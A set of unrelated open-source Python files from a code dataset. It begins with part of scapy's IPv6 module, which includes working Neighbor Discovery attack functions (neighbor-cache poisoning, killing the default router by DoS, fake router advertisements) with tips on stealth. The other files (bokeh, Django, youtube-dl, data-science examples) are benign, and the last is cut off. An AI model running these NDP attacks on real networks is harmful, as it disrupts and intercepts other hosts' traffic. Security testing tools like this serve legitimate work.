stimulus/response model. When called, it sends the same NS packet in loop
every second (the default)
Following arguments can be used to change the format of the packets:
src_lladdr: the MAC address used in the Source Link-Layer Address option
included in the NS packet. This is the address that the peer should
associate in its neighbor cache with the IPv6 source address of the
packet. If None is provided, the mac address of the interface is
used.
src: the IPv6 address used as source of the packet. If None is provided,
an address associated with the emitting interface will be used
(based on the destination address of the packet).
target: the target address of the NS packet. If no value is provided,
a dummy address (2001:db8::1) is used. The value of the target
has a direct impact on the destination address of the packet if it
is not overridden. By default, the solicited-node multicast address
associated with the target is used as destination address of the
packet. Consider specifying a specific destination address if you
intend to use a target address different than the one of the victim.
dst: The destination address of the NS. By default, the solicited node
multicast address associated with the target address (see previous
parameter) is used if no specific value is provided. The victim
is not expected to check the destination address of the packet,
so using a multicast address like ff02::1 should work if you want
the attack to target all hosts on the link. On the contrary, if
you want to be more stealth, you should provide the target address
for this parameter in order for the packet to be sent only to the
victim.
src_mac: the MAC address used as source of the packet. By default, this
is the address of the interface. If you want to be more stealth,
feel free to use something else. Note that this address is not the
that the victim will use to populate its neighbor cache.
dst_mac: The MAC address used as destination address of the packet. If
the IPv6 destination address is multicast (all-nodes, solicited
node, ...), it will be computed. If the destination address is
unicast, a neighbor solicitation will be performed to get the
associated address. If you want the attack to be stealth, you
can provide the MAC address using this parameter.
loop: By default, this parameter is True, indicating that NS packets
will be sent in loop, separated by 'inter' seconds (see below).
When set to False, a single packet is sent.
inter: When loop parameter is True (the default), this parameter provides
the interval in seconds used for sending NS packets.
iface: to force the sending interface.
"""
if not iface:
iface = conf.iface
# Use provided MAC address as source link-layer address option
# or the MAC address of the interface if none is provided.
if not src_lladdr:
src_lladdr = get_if_hwaddr(iface)
# Prepare packets parameters
ether_params = {}
if src_mac:
ether_params["src"] = src_mac
if dst_mac:
ether_params["dst"] = dst_mac
ipv6_params = {}
if src:
ipv6_params["src"] = src
if dst:
ipv6_params["dst"] = dst
else:
# Compute the solicited-node multicast address
# associated with the target address.
tmp = inet_ntop(socket.AF_INET6,
in6_getnsma(inet_pton(socket.AF_INET6, target)))
ipv6_params["dst"] = tmp
pkt = Ether(**ether_params)
pkt /= IPv6(**ipv6_params)
pkt /= ICMPv6ND_NS(tgt=target)
pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0)
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
ip_src_filter=None, reply_mac=None,
tgt_mac=None):
"""
The purpose of the function is to monitor incoming RA messages
sent by default routers (RA with a non-zero Router Lifetime values)
and invalidate them by immediately replying with fake RA messages
advertising a zero Router Lifetime value.
The result on receivers is that the router is immediately invalidated,
i.e. the associated entry is discarded from the default router list
and destination cache is updated to reflect the change.
By default, the function considers all RA messages with a non-zero
Router Lifetime value but provides configuration knobs to allow
filtering RA sent by specific routers (Ethernet source address).
With regard to emission, the multicast all-nodes address is used
by default but a specific target can be used, in order for the DoS to
apply only to a specific host.
More precisely, following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RA messages received from this source will trigger replies.
If other default routers advertised their presence on the link,
their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific mac address.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RA messages received from this source address will trigger
replies. If other default routers advertised their presence on the
link, their clients will not be impacted by the attack. The default
value is None: the DoS is not limited to a specific IPv6 source
address.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface.
tgt_mac: allow limiting the effect of the DoS to a specific host,
by sending the "invalidating RA" only to its mac address.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
# Check if this is an advertisement for a Default Router
# by looking at Router Lifetime value
if req[ICMPv6ND_RA].routerlifetime == 0:
return 0
return 1
def ra_reply_callback(req, reply_mac, tgt_mac, iface):
"""
Callback that sends an RA with a 0 lifetime
"""
# Let's build a reply and send it
src = req[IPv6].src
# Prepare packets parameters
ether_params = {}
if reply_mac:
ether_params["src"] = reply_mac
if tgt_mac:
ether_params["dst"] = tgt_mac
# Basis of fake RA (high pref, zero lifetime)
rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)
# Add it a PIO from the request ...
tmp = req
while ICMPv6NDOptPrefixInfo in tmp:
pio = tmp[ICMPv6NDOptPrefixInfo]
tmp = pio.payload
del(pio.payload)
rep /= pio
# ... and source link layer address option
if ICMPv6NDOptSrcLLAddr in req:
mac = req[ICMPv6NDOptSrcLLAddr].lladdr
else:
mac = req[Ether].src
rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)
sendp(rep, iface=iface, verbose=0)
print("Fake RA sent with source address %s" % src)
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
iface=iface)
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
The purpose of this function is to send provided RA message at layer 2
(i.e. providing a packet starting with IPv6 will not work) in response
to received RS messages. In the end, the function is a simple wrapper
around sendp() that monitor the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
Following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
Note that no changes to provided RA is done which imply that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
replies. Same comment as for previous argument apply: if you use
the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print("Fake RA sent in response to RS from %s" % src)
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
# Pre-load classes ##
#############################################################################
def _get_cls(name):
return globals().get(name, Raw)
def _load_dict(d):
for k, v in d.items():
d[k] = _get_cls(v)
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
#############################################################################
#############################################################################
# Layers binding #
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explaination, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
if WINDOWS:
bind_layers(Loopback, IPv6, type=0x18)
else:
bind_layers(Loopback, IPv6, type=socket.AF_INET6)
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
|
secdev/scapy
|
scapy/layers/inet6.py
|
Python
|
gpl-2.0
| 155,317
|
from __future__ import print_function
from bokeh.util.browser import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.glyphs import Circle
from bokeh.models import (
GMapPlot, Range1d, ColumnDataSource, PanTool, WheelZoomTool, BoxSelectTool, GMapOptions)
from bokeh.resources import INLINE
x_range = Range1d()
y_range = Range1d()
# JSON style string taken from: https://snazzymaps.com/style/1/pale-dawn
map_options = GMapOptions(lat=30.2861, lng=-97.7394, map_type="roadmap", zoom=13, styles="""
[{"featureType":"administrative","elementType":"all","stylers":[{"visibility":"on"},{"lightness":33}]},{"featureType":"landscape","elementType":"all","stylers":[{"color":"#f2e5d4"}]},{"featureType":"poi.park","elementType":"geometry","stylers":[{"color":"#c5dac6"}]},{"featureType":"poi.park","elementType":"labels","stylers":[{"visibility":"on"},{"lightness":20}]},{"featureType":"road","elementType":"all","stylers":[{"lightness":20}]},{"featureType":"road.highway","elementType":"geometry","stylers":[{"color":"#c5c6c6"}]},{"featureType":"road.arterial","elementType":"geometry","stylers":[{"color":"#e4d7c6"}]},{"featureType":"road.local","elementType":"geometry","stylers":[{"color":"#fbfaf7"}]},{"featureType":"water","elementType":"all","stylers":[{"visibility":"on"},{"color":"#acbcc9"}]}]
""")
# Google Maps now requires an API key. You can find out how to get one here:
# https://developers.google.com/maps/documentation/javascript/get-api-key
API_KEY = "XXXXXXXXXXX"
plot = GMapPlot(
x_range=x_range, y_range=y_range,
map_options=map_options,
api_key=API_KEY,
)
plot.title.text = "Austin"
source = ColumnDataSource(
data=dict(
lat=[30.2861, 30.2855, 30.2869],
lon=[-97.7394, -97.7390, -97.7405],
fill=['orange', 'blue', 'green']
)
)
circle = Circle(x="lon", y="lat", size=15, fill_color="fill", line_color="black")
plot.add_glyph(source, circle)
pan = PanTool()
wheel_zoom = WheelZoomTool()
box_select = BoxSelectTool()
plot.add_tools(pan, wheel_zoom, box_select)
doc = Document()
doc.add_root(plot)
if __name__ == "__main__":
filename = "maps.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Google Maps Example"))
print("Wrote %s" % filename)
view(filename)
|
phobson/bokeh
|
examples/models/maps.py
|
Python
|
bsd-3-clause
| 2,314
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('umibukela', '0032_auto_20180511_1315'),
]
operations = [
migrations.AddField(
model_name='programme',
name='slug',
field=models.SlugField(max_length=200, unique=True, null=True),
),
]
|
Code4SA/umibukela
|
umibukela/migrations/0033_programme_slug.py
|
Python
|
mit
| 428
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_str,
)
from ..utils import (
clean_html,
ExtractorError,
int_or_none,
str_or_none,
try_get,
url_or_none,
urlencode_postdata,
urljoin,
)
class PlatziBaseIE(InfoExtractor):
_LOGIN_URL = 'https://platzi.com/login/'
_NETRC_MACHINE = 'platzi'
def _real_initialize(self):
self._login()
def _login(self):
username, password = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'email': username,
'password': password,
})
urlh = self._request_webpage(
self._LOGIN_URL, None, 'Logging in',
data=urlencode_postdata(login_form),
headers={'Referer': self._LOGIN_URL})
# login succeeded
if 'platzi.com/login' not in urlh.geturl():
return
login_error = self._webpage_read_content(
urlh, self._LOGIN_URL, None, 'Downloading login error page')
login = self._parse_json(
self._search_regex(
r'login\s*=\s*({.+?})(?:\s*;|\s*</script)', login_error, 'login'),
None)
for kind in ('error', 'password', 'nonFields'):
error = str_or_none(login.get('%sError' % kind))
if error:
raise ExtractorError(
'Unable to login: %s' % error, expected=True)
raise ExtractorError('Unable to log in')
class PlatziIE(PlatziBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
platzi\.com/clases| # es version
courses\.platzi\.com/classes # en version
)/[^/]+/(?P<id>\d+)-[^/?\#&]+
'''
_TESTS = [{
'url': 'https://platzi.com/clases/1311-next-js/12074-creando-nuestra-primera-pagina/',
'md5': '8f56448241005b561c10f11a595b37e3',
'info_dict': {
'id': '12074',
'ext': 'mp4',
'title': 'Creando nuestra primera página',
'description': 'md5:4c866e45034fc76412fbf6e60ae008bc',
'duration': 420,
},
'skip': 'Requires platzi account credentials',
}, {
'url': 'https://courses.platzi.com/classes/1367-communication-codestream/13430-background/',
'info_dict': {
'id': '13430',
'ext': 'mp4',
'title': 'Background',
'description': 'md5:49c83c09404b15e6e71defaf87f6b305',
'duration': 360,
},
'skip': 'Requires platzi account credentials',
'params': {
'skip_download': True,
},
}]
def _real_extract(self, url):
lecture_id = self._match_id(url)
webpage = self._download_webpage(url, lecture_id)
data = self._parse_json(
self._search_regex(
# client_data may contain "};" so that we have to try more
# strict regex first
(r'client_data\s*=\s*({.+?})\s*;\s*\n',
r'client_data\s*=\s*({.+?})\s*;'),
webpage, 'client data'),
lecture_id)
material = data['initialState']['material']
desc = material['description']
title = desc['title']
formats = []
for server_id, server in material['videos'].items():
if not isinstance(server, dict):
continue
for format_id in ('hls', 'dash'):
format_url = url_or_none(server.get(format_id))
if not format_url:
continue
if format_id == 'hls':
formats.extend(self._extract_m3u8_formats(
format_url, lecture_id, 'mp4',
entry_protocol='m3u8_native', m3u8_id=format_id,
note='Downloading %s m3u8 information' % server_id,
fatal=False))
elif format_id == 'dash':
formats.extend(self._extract_mpd_formats(
format_url, lecture_id, mpd_id=format_id,
note='Downloading %s MPD manifest' % server_id,
fatal=False))
self._sort_formats(formats)
content = str_or_none(desc.get('content'))
description = (clean_html(compat_b64decode(content).decode('utf-8'))
if content else None)
duration = int_or_none(material.get('duration'), invscale=60)
return {
'id': lecture_id,
'title': title,
'description': description,
'duration': duration,
'formats': formats,
}
class PlatziCourseIE(PlatziBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
platzi\.com/clases| # es version
courses\.platzi\.com/classes # en version
)/(?P<id>[^/?\#&]+)
'''
_TESTS = [{
'url': 'https://platzi.com/clases/next-js/',
'info_dict': {
'id': '1311',
'title': 'Curso de Next.js',
},
'playlist_count': 22,
}, {
'url': 'https://courses.platzi.com/classes/communication-codestream/',
'info_dict': {
'id': '1367',
'title': 'Codestream Course',
},
'playlist_count': 14,
}]
@classmethod
def suitable(cls, url):
return False if PlatziIE.suitable(url) else super(PlatziCourseIE, cls).suitable(url)
def _real_extract(self, url):
course_name = self._match_id(url)
webpage = self._download_webpage(url, course_name)
props = self._parse_json(
self._search_regex(r'data\s*=\s*({.+?})\s*;', webpage, 'data'),
course_name)['initialProps']
entries = []
for chapter_num, chapter in enumerate(props['concepts'], 1):
if not isinstance(chapter, dict):
continue
materials = chapter.get('materials')
if not materials or not isinstance(materials, list):
continue
chapter_title = chapter.get('title')
chapter_id = str_or_none(chapter.get('id'))
for material in materials:
if not isinstance(material, dict):
continue
if material.get('material_type') != 'video':
continue
video_url = urljoin(url, material.get('url'))
if not video_url:
continue
entries.append({
'_type': 'url_transparent',
'url': video_url,
'title': str_or_none(material.get('name')),
'id': str_or_none(material.get('id')),
'ie_key': PlatziIE.ie_key(),
'chapter': chapter_title,
'chapter_number': chapter_num,
'chapter_id': chapter_id,
})
course_id = compat_str(try_get(props, lambda x: x['course']['id']))
course_title = try_get(props, lambda x: x['course']['name'], compat_str)
return self.playlist_result(entries, course_id, course_title)
|
vinegret/youtube-dl
|
youtube_dl/extractor/platzi.py
|
Python
|
unlicense
| 7,630
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# pilconfig for pyILPER
#
# (c) 2015 Joachim Siebold
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# pilconfig class -------------------------------------------
#
# Changelog
# 06.10.2015 jsi:
# - class statement syntax update
# 17.09.2016 jsi:
# - open method introduced
# 14.10.2016 jsi:
# - added filename parameter to cls_userconfig
# 17.08.2017 jsi:
# - assign "" to self.add_msg if parameter is none in PilConfigError
# 20.01.2018 jsi
# - added get_dual method
# 12.02.2018 jsi
# - added the clean parameter to the open method
# 12.12.2021 jsi
# - add configversion parameter to open method
#
from .userconfig import cls_userconfig, ConfigError
class PilConfigError(Exception):
def __init__(self,msg,add_msg= None):
self.msg= msg
if add_msg is None:
self.add_msg=""
else:
self.add_msg = add_msg
class cls_pilconfig:
#
# initialize: create instance
#
def __init__(self):
self.__config__= { }
self.__userconfig__ = None
return
#
# open: read in the configuration file into the dictionary
# if the configuration file does not exist, an empty file is created
# If clean is true do not read the config file
#
def open(self,name,configversion,instance,production,clean):
self.__userconfig__= cls_userconfig(name,name,configversion,instance,production)
if clean:
return
try:
self.__config__= self.__userconfig__.read(self.__config__)
except ConfigError as e:
raise PilConfigError(e.msg,e.add_msg)
#
# Get a key from the configuration dictionary. To initialize a key a default
# value can be specified
#
def get(self,name,param,default=None):
pname= name+"_"+param
try:
p= self.__config__[pname]
except KeyError:
if default is None:
raise PilConfigError("configuration parameter not found: "+pname)
else:
self.__config__[pname]= default
p=default
return(p)
#
# Get a key, first a local key, if the value is -1 then get the global key
#
def get_dual(self,name,param):
p = self.get(name,param)
if p == -1:
p = self.get("pyilper",param)
return(p)
#
# Put a key into the configuration dictrionary
#
def put(self,name,param,value):
pname= name+"_"+param
self.__config__[pname]= value
#
# Save the dictionary to the configuration file
#
def save(self):
try:
self.__userconfig__.write(self.__config__)
except ConfigError as e:
raise PilConfigError(e.msg,e.add_msg)
#
# Get the keys of the configuration file
#
def getkeys(self):
return(self.__config__.keys())
#
# remove an entry
#
def remove(self,key):
try:
del(self.__config__[key])
except KeyError:
pass
#
# create config instance
#
PILCONFIG= cls_pilconfig()
|
bug400/pyilper
|
pyilper/pilconfig.py
|
Python
|
gpl-2.0
| 3,560
|
class h:
a = 0
b = 1
def __init__(self):
print "hello world"
def sum(self):
return self.a + self.b
def setA(self, a):
self.a = a
def setB(self, b):
self.b = b
v = h()
v.setA(2)
c = v.sum()
print c
|
xu-wang11/Pyww
|
test8.py
|
Python
|
mit
| 254
|
# from electrum_arg.i18n import _
# fullname = 'KeepKey'
# description = _('Provides support for KeepKey hardware wallet')
# requires = [('keepkeylib','github.com/keepkey/python-keepkey')]
# registers_keystore = ('hardware', 'keepkey', _("KeepKey wallet"))
# available_for = ['qt', 'cmdline']
|
argentumproject/electrum-arg
|
plugins/keepkey/__init__.py
|
Python
|
mit
| 294
|
# Copyright (C) 2014, 2015, 2016 SICS Swedish ICT AB
#
# Main author: Tomas Olsson <tol@sics.se>
#
# License: BSD 3 clause
from visisc import _EventHierEle
__author__ = 'tol'
import visisc
import pyisc
class EventHierarchyElement(_EventHierEle):
child_ = None
sibling_ = None
parent_ = None
num_of_children = 0
def __init__(self, name):
'''
Create a event description that models the relation between a event and other events
so that a hierarchy of events can be visualised.
:param name: the string "name" is the name of the event.
:param parent: the EventHierarchyElement "parent" is the parent of the event in the sense
of being a more generic event type or a grouping of events.
:return:
'''
_EventHierEle.__init__(self, name, len(name))
def set_index_value(self, severity_level, index0):
'''
Set the index into the data vector (minus any offset) for a severity level
:param severity_level: an integer >= 0 and < visisc.get_global_severity_levels() (if only one level exists/is used then it should be set to 0
:param index: the integer "index" is the index of the event in the data vector for this event and severity_level
'''
assert severity_level >= 0 and severity_level < visisc.get_global_num_of_severity_levels()
pyisc._set_array_value(self.index, severity_level, index0)
def get_index_value(self, severity_level):
'''
Returns the index into the data vector for a severity level. If not set, it is equal to -1
:param severity_level:
:return: index to severity level
'''
assert severity_level >= 0 and severity_level < visisc.get_global_num_of_severity_levels()
return _EventHierEle.get_index_value(self, severity_level)
def add_child(self,element):
'''
Extends a parent with a child node.
:param element:
:return:
'''
element.parent = self
element.parent_ = self
self.num_of_children += 1
if self.child_ is None:
self.child_ = element
self.child = element
else:
self.child_._add_sibling(element)
def remove_child(self,element):
if self.child_ is None:
return
if self.child_ == element:
element.parent = None
element.parent_ = None
self.child_ = self.child_.sibling_
self.child = self.child.sibling
self.num_of_children -= 1
else:
self.child._remove_sibling(element)
def _add_sibling(self,element):
if self.sibling_ is None:
self.sibling_ = element
self.sibling = element
else:
self.sibling_._add_sibling(element)
def _remove_sibling(self,element):
if self.sibling_ == element:
element.parent = None
element.parent_ = None
self.sibling_ = self.sibling_.sibling_
self.sibling = self.sibling.sibling
self.parent.num_of_children -= 1
else:
self.sibling_._remove_sibling(element)
def to_string(self, level=0):
'''
Turns hierarchy to a string.
:param level:
:return:
'''
str = (" "*level) + self.name
if self.child_ is not None:
str += ":\n"
str += self.child_.to_string(level+1)
if self.sibling_ is not None:
str += "\n"
str += self.sibling_.to_string(level)
return str
def next(self):
'''
Let the caller iterate through the whole hierarchy until None is returned.
Beginning with the child and then the siblings.
:return: next element in the hierarchy.
'''
ele = self
if ele.child_ is not None:
return ele.child_
while ele.sibling_ is None and ele.parent_ is not None:
ele = ele.parent_
return ele.sibling_
def __str__(self):
return self.to_string()
|
STREAM3/visisc
|
_visisc_modules/EventHierarchy.py
|
Python
|
bsd-3-clause
| 4,104
|
from __future__ import division
import math, random, re
from collections import defaultdict, Counter
from bs4 import BeautifulSoup
import requests
def plot_resumes(plt):
data = [ ("big data", 100, 15), ("Hadoop", 95, 25), ("Python", 75, 50),
("R", 50, 40), ("machine learning", 80, 20), ("statistics", 20, 60),
("data science", 60, 70), ("analytics", 90, 3),
("team player", 85, 85), ("dynamic", 2, 90), ("synergies", 70, 0),
("actionable insights", 40, 30), ("think out of the box", 45, 10),
("self-starter", 30, 50), ("customer focus", 65, 15),
("thought leadership", 35, 35)]
def text_size(total):
"""equals 8 if total is 0, 28 if total is 200"""
return 8 + total / 200 * 20
for word, job_popularity, resume_popularity in data:
plt.text(job_popularity, resume_popularity, word,
ha='center', va='center',
size=text_size(job_popularity + resume_popularity))
plt.xlabel("Popularity on Job Postings")
plt.ylabel("Popularity on Resumes")
plt.axis([0, 100, 0, 100])
plt.show()
#
# n-gram models
#
def fix_unicode(text):
return text.replace(u"\u2019", "'")
def get_document():
url = "http://radar.oreilly.com/2010/06/what-is-data-science.html"
html = requests.get(url).text
soup = BeautifulSoup(html, 'html5lib')
content = soup.find("div", "article-body") # find article-body div
regex = r"[\w']+|[\.]" # matches a word or a period
document = []
for paragraph in content("p"):
words = re.findall(regex, fix_unicode(paragraph.text))
document.extend(words)
return document
def generate_using_bigrams(transitions):
current = "." # this means the next word will start a sentence
result = []
while True:
next_word_candidates = transitions[current] # bigrams (current, _)
current = random.choice(next_word_candidates) # choose one at random
result.append(current) # append it to results
if current == ".": return " ".join(result) # if "." we're done
def generate_using_trigrams(starts, trigram_transitions):
current = random.choice(starts) # choose a random starting word
prev = "." # and precede it with a '.'
result = [current]
while True:
next_word_candidates = trigram_transitions[(prev, current)]
next = random.choice(next_word_candidates)
prev, current = current, next
result.append(current)
if current == ".":
return " ".join(result)
def is_terminal(token):
return token[0] != "_"
def expand(grammar, tokens):
for i, token in enumerate(tokens):
# ignore terminals
if is_terminal(token): continue
# choose a replacement at random
replacement = random.choice(grammar[token])
if is_terminal(replacement):
tokens[i] = replacement
else:
tokens = tokens[:i] + replacement.split() + tokens[(i+1):]
return expand(grammar, tokens)
# if we get here we had all terminals and are done
return tokens
def generate_sentence(grammar):
return expand(grammar, ["_S"])
#
# Gibbs Sampling
#
def roll_a_die():
return random.choice([1,2,3,4,5,6])
def direct_sample():
d1 = roll_a_die()
d2 = roll_a_die()
return d1, d1 + d2
def random_y_given_x(x):
"""equally likely to be x + 1, x + 2, ... , x + 6"""
return x + roll_a_die()
def random_x_given_y(y):
if y <= 7:
# if the total is 7 or less, the first die is equally likely to be
# 1, 2, ..., (total - 1)
return random.randrange(1, y)
else:
# if the total is 7 or more, the first die is equally likely to be
# (total - 6), (total - 5), ..., 6
return random.randrange(y - 6, 7)
def gibbs_sample(num_iters=100):
x, y = 1, 2 # doesn't really matter
for _ in range(num_iters):
x = random_x_given_y(y)
y = random_y_given_x(x)
return x, y
def compare_distributions(num_samples=1000):
counts = defaultdict(lambda: [0, 0])
for _ in range(num_samples):
counts[gibbs_sample()][0] += 1
counts[direct_sample()][1] += 1
return counts
#
# TOPIC MODELING
#
def sample_from(weights):
total = sum(weights)
rnd = total * random.random() # uniform between 0 and total
for i, w in enumerate(weights):
rnd -= w # return the smallest i such that
if rnd <= 0: return i # sum(weights[:(i+1)]) >= rnd
documents = [
["Hadoop", "Big Data", "HBase", "Java", "Spark", "Storm", "Cassandra"],
["NoSQL", "MongoDB", "Cassandra", "HBase", "Postgres"],
["Python", "scikit-learn", "scipy", "numpy", "statsmodels", "pandas"],
["R", "Python", "statistics", "regression", "probability"],
["machine learning", "regression", "decision trees", "libsvm"],
["Python", "R", "Java", "C++", "Haskell", "programming languages"],
["statistics", "probability", "mathematics", "theory"],
["machine learning", "scikit-learn", "Mahout", "neural networks"],
["neural networks", "deep learning", "Big Data", "artificial intelligence"],
["Hadoop", "Java", "MapReduce", "Big Data"],
["statistics", "R", "statsmodels"],
["C++", "deep learning", "artificial intelligence", "probability"],
["pandas", "R", "Python"],
["databases", "HBase", "Postgres", "MySQL", "MongoDB"],
["libsvm", "regression", "support vector machines"]
]
K = 4
document_topic_counts = [Counter()
for _ in documents]
topic_word_counts = [Counter() for _ in range(K)]
topic_counts = [0 for _ in range(K)]
document_lengths = map(len, documents)
distinct_words = set(word for document in documents for word in document)
W = len(distinct_words)
D = len(documents)
def p_topic_given_document(topic, d, alpha=0.1):
"""the fraction of words in document _d_
that are assigned to _topic_ (plus some smoothing)"""
return ((document_topic_counts[d][topic] + alpha) /
(document_lengths[d] + K * alpha))
def p_word_given_topic(word, topic, beta=0.1):
"""the fraction of words assigned to _topic_
that equal _word_ (plus some smoothing)"""
return ((topic_word_counts[topic][word] + beta) /
(topic_counts[topic] + W * beta))
def topic_weight(d, word, k):
"""given a document and a word in that document,
return the weight for the k-th topic"""
return p_word_given_topic(word, k) * p_topic_given_document(k, d)
def choose_new_topic(d, word):
return sample_from([topic_weight(d, word, k)
for k in range(K)])
random.seed(0)
document_topics = [[random.randrange(K) for word in document]
for document in documents]
for d in range(D):
for word, topic in zip(documents[d], document_topics[d]):
document_topic_counts[d][topic] += 1
topic_word_counts[topic][word] += 1
topic_counts[topic] += 1
for iter in range(1000):
for d in range(D):
for i, (word, topic) in enumerate(zip(documents[d],
document_topics[d])):
# remove this word / topic from the counts
# so that it doesn't influence the weights
document_topic_counts[d][topic] -= 1
topic_word_counts[topic][word] -= 1
topic_counts[topic] -= 1
document_lengths[d] -= 1
# choose a new topic based on the weights
new_topic = choose_new_topic(d, word)
document_topics[d][i] = new_topic
# and now add it back to the counts
document_topic_counts[d][new_topic] += 1
topic_word_counts[new_topic][word] += 1
topic_counts[new_topic] += 1
document_lengths[d] += 1
if __name__ == "__main__":
document = get_document()
bigrams = zip(document, document[1:])
transitions = defaultdict(list)
for prev, current in bigrams:
transitions[prev].append(current)
random.seed(0)
print "bigram sentences"
for i in range(10):
print i, generate_using_bigrams(transitions)
print
# trigrams
trigrams = zip(document, document[1:], document[2:])
trigram_transitions = defaultdict(list)
starts = []
for prev, current, next in trigrams:
if prev == ".": # if the previous "word" was a period
starts.append(current) # then this is a start word
trigram_transitions[(prev, current)].append(next)
print "trigram sentences"
for i in range(10):
print i, generate_using_trigrams(starts, trigram_transitions)
print
grammar = {
"_S" : ["_NP _VP"],
"_NP" : ["_N",
"_A _NP _P _A _N"],
"_VP" : ["_V",
"_V _NP"],
"_N" : ["data science", "Python", "regression"],
"_A" : ["big", "linear", "logistic"],
"_P" : ["about", "near"],
"_V" : ["learns", "trains", "tests", "is"]
}
print "grammar sentences"
for i in range(10):
print i, " ".join(generate_sentence(grammar))
print
print "gibbs sampling"
comparison = compare_distributions()
for roll, (gibbs, direct) in comparison.iteritems():
print roll, gibbs, direct
# topic MODELING
for k, word_counts in enumerate(topic_word_counts):
